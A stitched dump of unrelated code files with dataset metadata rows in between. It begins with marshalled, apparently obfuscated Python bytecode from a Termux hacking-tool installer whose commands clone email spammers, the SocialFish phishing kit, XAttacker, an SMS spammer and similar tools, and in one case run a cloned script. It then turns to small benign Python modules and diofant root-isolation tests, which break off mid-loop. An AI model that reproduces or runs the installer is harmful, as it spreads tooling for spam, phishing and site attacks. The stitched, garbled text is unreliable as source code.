~t\x02\x00\x00\x0051s\x11\x00\x00\x00Install KnockMails!\x00\x00\x00pip2 install validate_email pyDNSs,\x00\x00\x00git clone https://github.com/4w4k3/KnockMails\x0e\x00\x00\x00mv KnockMail ~s\x08\x00\x00\x00Done Ocet\x02\x00\x00\x0052s\x0b\x00\x00\x00Install Hacs)\x00\x00\x00git clone https://github.com/Cvar1984/Hacs\x08\x00\x00\x00mv Hac ~t\x02\x00\x00\x0053s\x12\x00\x00\x00Install Spam Emails9\x00\x00\x00apt install git python2 && pip2 install argparse requestss4\x00\x00\x00git clone https://github.com/p4kl0nc4t/Spammer-Emails\x12\x00\x00\x00mv Spammer-Email ~t\x02\x00\x00\x0054s\x0e\x00\x00\x00Install Rang3rs:\x00\x00\x00apt install git python2 && pip2 install optparse termcolors5\x00\x00\x00git clone https://github.com/floriankunushevci/rang3rs\x0b\x00\x00\x00mv rang3r ~t\x02\x00\x00\x0055s\r\x00\x00\x00Install SH33Ls+\x00\x00\x00git clone https://github.com/LOoLzeC/SH33LLs\x0b\x00\x00\x00mv SH33LL ~t\x02\x00\x00\x0056s\x12\x00\x00\x00social-engineerings\x18\x00\x00\x00apt install python2 perls7\x00\x00\x00git clone https://github.com/LOoLzeC/social-engineerings\x17\x00\x00\x00mv social-engineering ~t\x02\x00\x00\x0057s\x11\x00\x00\x00Install SpiderBots/\x00\x00\x00git clone https://github.com/Cvar1984/SpiderBots\x0e\x00\x00\x00mv SpiderBot ~t\x02\x00\x00\x0058s\r\x00\x00\x00Install Ngroks1\x00\x00\x00git clone https://github.com/themastersunil/ngroks\n\x00\x00\x00mv ngrok ~t\x02\x00\x00\x0059s\x0c\x00\x00\x00Install Sudos\x1d\x00\x00\x00apt install ncurses-utils gits-\x00\x00\x00git clone https://github.com/st42/termux-sudos3\x00\x00\x00mv termux-sudo ~ && cd ~/termux-sudo && chmod 777 *s3\x00\x00\x00cat sudo > /data/data/com.termux/files/usr/bin/sudos2\x00\x00\x00chmod 700 /data/data/com.termux/files/usr/bin/sudot\x02\x00\x00\x0060s\x0e\x00\x00\x00Install Ubuntus2\x00\x00\x00git clone https://github.com/Neo-Oli/termux-ubuntus:\x00\x00\x00mv termux-ubuntu ~ && cd ~/termux-ubuntu && bash ubuntu.sht\x02\x00\x00\x0061s\x0e\x00\x00\x00Install Fedoras\x14\x00\x00\x00apt install wget gitsU\x00\x00\x00wget https://raw.githubusercontent.com/nmilosev/termux-fedora/master/termux-fedora.shs\x15\x00\x00\x00mv termux-fedora.sh ~s\x12\x00\x00\x00 Install XAttackers\x14\x00\x00\x00apt install git perls\x1a\x00\x00\x00cpnm install HTTP::Requests\x1b\x00\x00\x00cpnm install LWP::Useragents3\x00\x00\x00git clone https://github.com/Moham3dRiahi/XAttackers\x0e\x00\x00\x00mv XAttacker ~t\x02\x00\x00\x0063s\x0c\x00\x00\x00Install VCRTs:\x00\x00\x00git clone https://github.com/LOoLzeC/Evil-create-frameworks\x1a\x00\x00\x00mv Evil-create-framework ~t\x02\x00\x00\x0064s\x13\x00\x00\x00Install Social-Fishs,\x00\x00\x00apt install python2 git && pip2 install wgets1\x00\x00\x00git clone https://github.com/UndeadSec/SocialFishs\x0f\x00\x00\x00mv SocialFish ~t\x02\x00\x00\x0065s\r\x00\x00\x00Install ECodes+\x00\x00\x00git clone https://github.com/Cvar1984/Ecodes\n\x00\x00\x00mv Ecode ~t\x02\x00\x00\x0066s\x0f\x00\x00\x00Install Hashzers/\x00\x00\x00git clone https://github.com/Anb3rSecID/Hashzers\x0c\x00\x00\x00mv Hashzer ~t\x02\x00\x00\x0067s\x10\x00\x00\x00Install XSStrikes8\x00\x00\x00pip2 install fuzzywuzzy prettytable mechanize HTMLParsers5\x00\x00\x00git clone https://github.com/UltimateHackers/XSStrikes\r\x00\x00\x00mv XSStrike ~t\x02\x00\x00\x0068s\x10\x00\x00\x00Install Breachers\x1e\x00\x00\x00pip2 install requests argparses5\x00\x00\x00git clone https://github.com/UltimateHackers/Breachers\r\x00\x00\x00mv Breacher ~t\x02\x00\x00\x0069s\x0f\x00\x00\x00Install PassGens-\x00\x00\x00git clone https://github.com/Cvar1984/PassGens\x0c\x00\x00\x00mv PassGen ~t\x02\x00\x00\x0070s\x0f\x00\x00\x00Install SpazSmss0\x00\x00\x00apt install git python2 && pip2 install requestss-\x00\x00\x00git clone https://github.com/Gameye98/SpazSMSs\x0c\x00\x00\x00mv SpazSMS ~t\x02\x00\x00\x0099ss\x01\x00\x00Thanks Sudah Pakai Tools Saya & Thanks All Mem CoiZter_Team - Thanks To Ghozt666h05t - XEIT_Cyber - Z#Sec - ./Mr ID - Lazy Time - Mr.-12cb - Mr.Han - Mr.Hellme - M r.EXe - GOODBLIZE - DISCONNECT - Mr.4r7Hu12 - Mr.Zin3_Xpl0it - F4ILURE_ID - Epp666h05t - 777GRxZH05T - X999ZploitX - ./XeitGhost - Mr.ZKi - Mr Ez1o - ZsecDet - ./Mr.CROPz - Mr.BrPinG And All Mem CoiZter_Team(\x15\x00\x00\x00R\x0b\x00\x00\x00t\x06\x00\x00\x00base64R\x04\x00\x00\x00R\x00\x00\x00\x00R\x06\x00\x00\x00R\t\x00\x00\x00R\x11\x00\x00\x00t\x06\x00\x00\x00systemt\x01\x00\x00\x00Et\x01\x00\x00\x00Rt\x01\x00\x00\x00Gt\x01\x00\x00\x00Yt\x01\x00\x00\x00Bt\x01\x00\x00\x00Pt\x01\x00\x00\x00Ct\x02\x00\x00\x00GRt\x01\x00\x00\x00Tt\x01\x00\x00\x00Ft\x01\x00\x00\x00Kt\t\x00\x00\x00raw_inputt\x0b\x00\x00\x00xeit666h05t(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00<module>\t\x00\x00\x00sv\x05\x00\x00\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x02\t\x06\t\x04\r\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x07\x08\x01\x10\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x10\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x10\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x0c\x01\x05\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x08\x02\x18\x02''')) | 15,781.666667 | 47,329 | 0.762256 | 9,833 | 47,345 | 3.667751 | 0.100681 | 0.108804 | 0.09957 | 0.11715 | 0.629031 | 0.58999 | 0.577402 | 0.54496 | 0.503979 | 0.428088 | 0 | 0.355264 | 0.02919 | 47,345 | 3 | 47,329 | 15,781.666667 | 0.429389 | 0 | 0 | 0 | 0 | 0.5 | 0.999092 | 0.812166 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 11 |
43c771fc8862bf7f7dd831f06f11524bcb38ceeb | 196 | py | Python | pineboolib/fllegacy/flparameterquery.py | juanjosepablos/pineboo | f6ce515aec6e0139821bb9c1d62536d9fb50dae4 | [
"MIT"
] | 2 | 2017-12-10T23:06:16.000Z | 2017-12-10T23:06:23.000Z | pineboolib/fllegacy/flparameterquery.py | Aulla/pineboo | 3ad6412d365a6ad65c3bb2bdc03f5798d7c37004 | [
"MIT"
] | 36 | 2017-11-05T21:13:47.000Z | 2020-08-26T15:56:15.000Z | pineboolib/fllegacy/flparameterquery.py | Aulla/pineboo | 3ad6412d365a6ad65c3bb2bdc03f5798d7c37004 | [
"MIT"
] | 8 | 2017-11-05T15:56:31.000Z | 2019-04-25T16:32:28.000Z | """Flparamaterquey module."""
from pineboolib.application.database.pnparameterquery import PNParameterQuery
class FLParameterQuery(PNParameterQuery):
"""FLParameterQuery class."""
pass
| 21.777778 | 77 | 0.785714 | 15 | 196 | 10.266667 | 0.733333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112245 | 196 | 8 | 78 | 24.5 | 0.885057 | 0.239796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
43d9adbbb5040d1c28b04d0a61b25bd07c383123 | 48 | py | Python | collada_wt/__init__.py | charlie9578/wind-turbine-kml | 297b3d25672e82456485387bbb4e9a97873cf136 | [
"BSD-3-Clause"
] | null | null | null | collada_wt/__init__.py | charlie9578/wind-turbine-kml | 297b3d25672e82456485387bbb4e9a97873cf136 | [
"BSD-3-Clause"
] | null | null | null | collada_wt/__init__.py | charlie9578/wind-turbine-kml | 297b3d25672e82456485387bbb4e9a97873cf136 | [
"BSD-3-Clause"
] | null | null | null | from collada_wt.collada_wt import create_turbine | 48 | 48 | 0.916667 | 8 | 48 | 5.125 | 0.75 | 0.439024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 48 | 1 | 48 | 48 | 0.911111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
603ef93207cca9b50bdfe4f140fe5b401faccee7 | 117 | py | Python | authz/util/__init__.py | saeedhosseini21/AuthService | 4707e376ed7219205005c51783ba58ef859f4d14 | [
"Apache-2.0"
] | null | null | null | authz/util/__init__.py | saeedhosseini21/AuthService | 4707e376ed7219205005c51783ba58ef859f4d14 | [
"Apache-2.0"
] | null | null | null | authz/util/__init__.py | saeedhosseini21/AuthService | 4707e376ed7219205005c51783ba58ef859f4d14 | [
"Apache-2.0"
] | null | null | null | from authz.util.jsonify import jsonify
from authz.util.now import now
from authz.util.expires import user_expires_at
| 29.25 | 46 | 0.846154 | 20 | 117 | 4.85 | 0.45 | 0.278351 | 0.402062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 117 | 3 | 47 | 39 | 0.92381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6074ef926e78cfca58a36a2d51f2b8b5deb3ed4a | 45,250 | py | Python | diofant/tests/polys/test_rootisolation.py | diofant/omg | 72fd45f832240d1ded6f0a411e97bb9f7aa9f1d2 | [
"BSD-3-Clause"
] | null | null | null | diofant/tests/polys/test_rootisolation.py | diofant/omg | 72fd45f832240d1ded6f0a411e97bb9f7aa9f1d2 | [
"BSD-3-Clause"
] | null | null | null | diofant/tests/polys/test_rootisolation.py | diofant/omg | 72fd45f832240d1ded6f0a411e97bb9f7aa9f1d2 | [
"BSD-3-Clause"
] | null | null | null | """Tests for real and complex root isolation and refinement algorithms."""
import math
import pytest
from diofant import (EX, QQ, ZZ, DomainError, I, RefinementFailed, ring, sqrt,
subsets)
from diofant.polys.rootisolation import RealInterval
__all__ = ()
def test__real_imag():
R, x, y = ring('x y', ZZ)
Rx = R.drop(y)
_y = R.symbols[1]
assert Rx._real_imag(Rx.zero, _y) == (0, 0)
assert Rx._real_imag(Rx.one, _y) == (1, 0)
assert Rx._real_imag(Rx.x + 1, _y) == (x + 1, y)
assert Rx._real_imag(Rx.x + 2, _y) == (x + 2, y)
assert Rx._real_imag(Rx.x**2 + 2*Rx.x + 3, _y) == (x**2 - y**2 + 2*x + 3,
2*x*y + 2*y)
f = Rx.x**3 + Rx.x**2 + Rx.x + 1
assert Rx._real_imag(f, _y) == (x**3 + x**2 - 3*x*y**2 + x - y**2 + 1,
3*x**2*y + 2*x*y - y**3 + y)
R, x, y = ring('x y', EX)
Rx = R.drop(y)
pytest.raises(DomainError, lambda: Rx._real_imag(Rx.x + 1))
R = QQ.algebraic_field(I).inject('x', 'y')
Rx = R.drop(1)
_y = R.symbols[1]
x, y = R.to_ground().gens
f = Rx.x**2 + I*Rx.x - 1
r = x**2 - y**2 - y - 1
i = 2*x*y + x
assert Rx._real_imag(f, _y) == (r, i)
f = Rx.x**4 + I*Rx.x**3 - Rx.x + 1
r = x**4 - 6*x**2*y**2 - 3*x**2*y - x + y**4 + y**3 + 1
i = 4*x**3*y + x**3 - 4*x*y**3 - 3*x*y**2 - y
assert Rx._real_imag(f, _y) == (r, i)
K = QQ.algebraic_field(sqrt(2))
R = K.inject('x', 'y')
Rx = R.drop(1)
_y = R.symbols[1]
x, y = R.gens
f = Rx.x**2 + sqrt(2)*Rx.x - 1
assert Rx._real_imag(f, _y) == (x**2 - y**2 + sqrt(2)*x - 1, 2*x*y + sqrt(2)*y)
K = K.algebraic_field(I)
R = K.inject('x', 'y')
Rx = R.drop(1)
_y = R.symbols[1]
x, y = R.to_ground().gens
f = Rx.x**2 + 2*sqrt(2)*I*Rx.x - 1 + I
assert Rx._real_imag(f, _y) == (x**2 - y**2 - 2*sqrt(2)*y - 1,
2*x*y + 2*sqrt(2)*x + 1)
def test__transform():
R, x = ring('x', ZZ)
assert R._transform(R(0), R(0), x + 1) == 0
assert R._transform(R(0), R(1), x + 1) == 0
assert R._transform(R(0), x + 2, x + 1) == 0
assert R._transform(x**2 - 2*x + 1, x**2 + 1,
x - 1) == x**4 - 2*x**3 + 5*x**2 - 4*x + 4
assert (R._transform(6*x**4 - 5*x**3 + 4*x**2 - 3*x + 17,
x**2 - 3*x + 4, 2*x - 3) ==
6*x**8 - 82*x**7 + 541*x**6 - 2205*x**5 + 6277*x**4 -
12723*x**3 + 17191*x**2 - 13603*x + 4773)
def test__reverse():
R, x = ring('x', ZZ)
assert R._reverse(x**3 + 2*x**2 + 3) == 3*x**3 + 2*x + 1
assert R._reverse(x**3 + 2*x**2 + 3*x) == 3*x**2 + 2*x + 1
def test_sturm():
R, x = ring('x', QQ)
assert R(5).sturm() == [1]
assert x.sturm() == [x, 1]
f = x**3 - 2*x**2 + 3*x - 5
assert f.sturm() == [f, 3*x**2 - 4*x + 3,
-10*x/9 + QQ(13, 3), -QQ(3303, 100)]
f = x**3 - 2*x**2 + x - 3
assert f.sturm() == [f, 3*x**2 - 4*x + 1, 2*x/9 + QQ(25, 9), QQ(-2079, 4)]
pytest.raises(DomainError, lambda: x.set_domain(ZZ).sturm())
F = ZZ.frac_field('pi')
pi = F.pi
R, x = ring('x', F)
f = (1024/(15625*pi**8)*x**5 - 4096/(625*pi**8)*x**4 + 32/(15625*pi**4)*x**3
- 128/(625*pi**4)*x**2 + x/62500 - F((1, 625)))
assert f.sturm() == [x**3 - 100*x**2 + pi**4/64*x - 25*pi**4/16,
3*x**2 - 200*x + pi**4/64,
(F((20000, 9)) - pi**4/96)*x + 25*pi**4/18,
(-3686400000000*pi**4 - 11520000*pi**8 -
9*pi**12)/(26214400000000 - 245760000*pi**4 +
576*pi**8)]
def test__sign_variations():
R, x = ring('x', ZZ)
assert R._sign_variations(R(0)) == 0
assert R._sign_variations(x) == 0
assert R._sign_variations(x**2 + 2) == 0
assert R._sign_variations(x*(x**2 + 3)) == 0
assert R._sign_variations(x**4 + 4*x**2 + 5) == 0
assert R._sign_variations(2 - x**2) == 1
assert R._sign_variations(x*(3 - x**2)) == 1
assert R._sign_variations((5 - x**2)*(x**2 + 1)) == 1
assert R._sign_variations(-x**2 - 4*x - 5) == 0
assert R._sign_variations((x - 5)*(x + 1)) == 1
assert R._sign_variations((x - 1)*(x + 5)) == 1
assert R._sign_variations(+x**2 - 4*x + 5) == 2
assert R._sign_variations(-x**2 + 4*x - 5) == 2
assert R._sign_variations((5 - x)*(x + 1)) == 1
assert R._sign_variations((1 - x)*(x + 5)) == 1
assert R._sign_variations(+x**2 + 4*x + 5) == 0
assert R._sign_variations(-x**4 - 4*x**2 - 5) == 0
assert R._sign_variations((x**2 - 5)*(x**2 + 1)) == 1
assert R._sign_variations((x - 1)*(x + 1)*(x**2 + 5)) == 1
assert R._sign_variations(+x**4 - 4*x**2 + 5) == 2
assert R._sign_variations(-x**4 + 4*x**2 - 5) == 2
assert R._sign_variations((5 - x**2)*(x**2 + 1)) == 1
assert R._sign_variations((1 - x)*(x + 1)*(x**2 + 5)) == 1
assert R._sign_variations(+x**4 + 4*x**2 + 5) == 0
def test__root_upper_bound():
R, x = ring('x', ZZ)
assert R._root_upper_bound(+x - 1) == 4
assert R._root_upper_bound(-x - 1) is None
R, x = ring('x', QQ)
assert R._root_upper_bound(+x - 1) == 4
assert R._root_upper_bound(-x - 1) is None
assert R._root_upper_bound(+x/2 - 1) is None
assert R._root_upper_bound(-x/2 - 1) is None
def test__step_refine_real_root():
R, x = ring('x', ZZ)
assert R._step_refine_real_root(x + 1,
(-2, 0, 1, 1)) == (x + 2, (0, -2, 1, 2))
def test__inner_refine_real_root():
R, x = ring('x', ZZ)
f = 2 - x**2
r = (1, QQ(3, 2))
assert R._inner_refine_real_root(f, (1, 2, 1, 1), steps=1) == r
def test__refine_real_root():
R, x = ring('x', ZZ)
f = x**2 - 2
assert R._refine_real_root(f, 1, 1, steps=1) == (1, 1)
assert R._refine_real_root(f, 1, 1, steps=9) == (1, 1)
pytest.raises(ValueError, lambda: R._refine_real_root(f, -2, 2))
s, t = 1, 2
assert R._refine_real_root(f, s, t, steps=0) == (1, 2)
assert R._refine_real_root(f, s, t, steps=1) == (1, QQ(3, 2))
assert R._refine_real_root(f, s, t, steps=2) == (QQ(4, 3), QQ(3, 2))
assert R._refine_real_root(f, s, t, steps=3) == (QQ(7, 5), QQ(3, 2))
assert R._refine_real_root(f, s, t, steps=4) == (QQ(7, 5), QQ(10, 7))
assert R._refine_real_root(f, s, t, eps=QQ(1, 100)) == (QQ(24, 17), QQ(17, 12))
s, t = 1, QQ(3, 2)
assert R._refine_real_root(f, s, t, steps=0) == (1, QQ(3, 2))
assert R._refine_real_root(f, s, t, steps=1) == (QQ(4, 3), QQ(3, 2))
assert R._refine_real_root(f, s, t, steps=2) == (QQ(7, 5), QQ(3, 2))
assert R._refine_real_root(f, s, t, steps=3) == (QQ(7, 5), QQ(10, 7))
assert R._refine_real_root(f, s, t, steps=4) == (QQ(7, 5), QQ(17, 12))
s, t = 1, QQ(5, 3)
assert R._refine_real_root(f, s, t, steps=0) == (1, QQ(5, 3))
assert R._refine_real_root(f, s, t, steps=1) == (1, QQ(3, 2))
assert R._refine_real_root(f, s, t, steps=2) == (QQ(7, 5), QQ(3, 2))
assert R._refine_real_root(f, s, t, steps=3) == (QQ(7, 5), QQ(13, 9))
assert R._refine_real_root(f, s, t, steps=4) == (QQ(7, 5), QQ(27, 19))
s, t = -1, -2
assert R._refine_real_root(f, s, t, steps=0) == (-2, -1)
assert R._refine_real_root(f, s, t, steps=1) == (-QQ(3, 2), -1)
assert R._refine_real_root(f, s, t, steps=2) == (-QQ(3, 2), -QQ(4, 3))
assert R._refine_real_root(f, s, t, steps=3) == (-QQ(3, 2), -QQ(7, 5))
assert R._refine_real_root(f, s, t, steps=4) == (-QQ(10, 7), -QQ(7, 5))
pytest.raises(RefinementFailed, lambda: R._refine_real_root(f, 0, 1))
s, t, u, v, w = 1, 2, QQ(24, 17), QQ(17, 12), QQ(7, 5)
assert R._refine_real_root(f, s, t, eps=QQ(1, 100)) == (u, v)
assert R._refine_real_root(f, s, t, steps=6) == (u, v)
assert R._refine_real_root(f, s, t, eps=QQ(1, 100), steps=5) == (w, v)
assert R._refine_real_root(f, s, t, eps=QQ(1, 100), steps=6) == (u, v)
assert R._refine_real_root(f, s, t, eps=QQ(1, 100), steps=7) == (u, v)
s, t, u, v = -2, -1, QQ(-3, 2), QQ(-4, 3)
assert R._refine_real_root(f, s, t, disjoint=-5) == (s, t)
assert R._refine_real_root(f, s, t, disjoint=-v) == (s, t)
assert R._refine_real_root(f, s, t, disjoint=v) == (u, v)
s, t, u, v = 1, 2, QQ(4, 3), QQ(3, 2)
assert R._refine_real_root(f, s, t, disjoint=5) == (s, t)
assert R._refine_real_root(f, s, t, disjoint=-u) == (s, t)
assert R._refine_real_root(f, s, t, disjoint=u) == (u, v)
f = x**2 - 3
assert R._refine_real_root(f, 1, 2,
eps=QQ(1, 100)) == (QQ(19, 11), QQ(26, 15))
R, x = ring('x', QQ)
f = (x - QQ(1, 2))*(x + QQ(1, 2))
assert R._refine_real_root(f, 0, 1, steps=1) == (QQ(1, 2), QQ(1, 2))
D, y = ring('y', ZZ)
R, x = ring('x', D)
f = x**2 + y*x - 1
pytest.raises(DomainError, lambda: R._refine_real_root(f, 0, 1))
def test__isolate_real_roots_sqf():
R, x = ring('x', ZZ)
assert R._isolate_real_roots_sqf(R(0)) == []
assert R._isolate_real_roots_sqf(R(5)) == []
assert R._isolate_real_roots_sqf(x) == [(0, 0)]
f = x*(x + 1)
assert R._isolate_real_roots_sqf(f) == [(-1, -1), (0, 0)]
assert R._isolate_real_roots_sqf(f, inf=+1) == []
assert R._isolate_real_roots_sqf(f, sup=-1) == [(-1, -1)]
assert R._isolate_real_roots_sqf(f, sup=-2) == []
f = x*(x - 1)
assert R._isolate_real_roots_sqf(f) == [(0, 0), (1, 1)]
assert R._isolate_real_roots_sqf(x**4 + x + 1) == []
i = [(-2, -1), (1, 2)]
f = x**2 - 2
assert R._isolate_real_roots_sqf(+f) == i
assert R._isolate_real_roots_sqf(-f) == i
for r in range(2, 7):
for s in (1, 10, -1, -10):
f = R(math.prod(x - s*_ for _ in range(1, r)))
